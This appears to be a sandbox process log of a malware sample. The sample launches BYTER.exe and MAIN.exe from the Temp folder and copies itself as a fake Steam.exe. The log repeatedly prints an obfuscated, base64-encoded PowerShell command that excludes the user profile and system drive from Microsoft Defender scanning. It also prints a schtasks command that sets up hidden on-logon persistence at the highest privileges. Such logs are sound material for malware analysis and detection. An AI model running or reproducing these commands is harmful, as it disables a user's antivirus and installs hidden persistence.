cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp70DC.tmp.bat""

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-531399342165778056906781422141363396-1060219291-5034032141905332277-563561859"

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp8057.tmp.bat""

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "3209356941771363768-599244579-17035025121542075587-291538739524266970-2106023698"

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Roaming\Steam.exe

"C:\Users\Admin\AppData\Roaming\Steam.exe"

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Steam" /tr '"C:\Users\Admin\AppData\Roaming\Steam.exe"' & exit

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "Steam" /tr '"C:\Users\Admin\AppData\Roaming\Steam.exe"'

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-1760597343-8288439651944488240-239102127-100156141810872266401751689826208226846"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "464246134-516785921-1804402230-1075254709-670951212192293366716143279881461977868"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "1630216740-270672682-13908016851087346497-8557197681493966897845646012-1523906610"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "40315970526016847686875520-2052835158-1570726529-1043843204-1332126734-307665969"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "9552789131872800189-1467004871-643479173604001312110694821-571614181204897437"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-1798402866-854451321-1498489360-1128336277-133119129215744342521431272360-200970955"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-9861232508163872984715320891318032363-1319720850-2688157671497766409-228127435"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "171520143456164269197818441-19360905231759698437-130725631791066761-442870599"

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-358902365948312753863198500276121551-160505813818928297931922359574-1072181426"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-6688185441245147572-776670553-20337787802058778457-2047499821-1255277638-1129605797"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

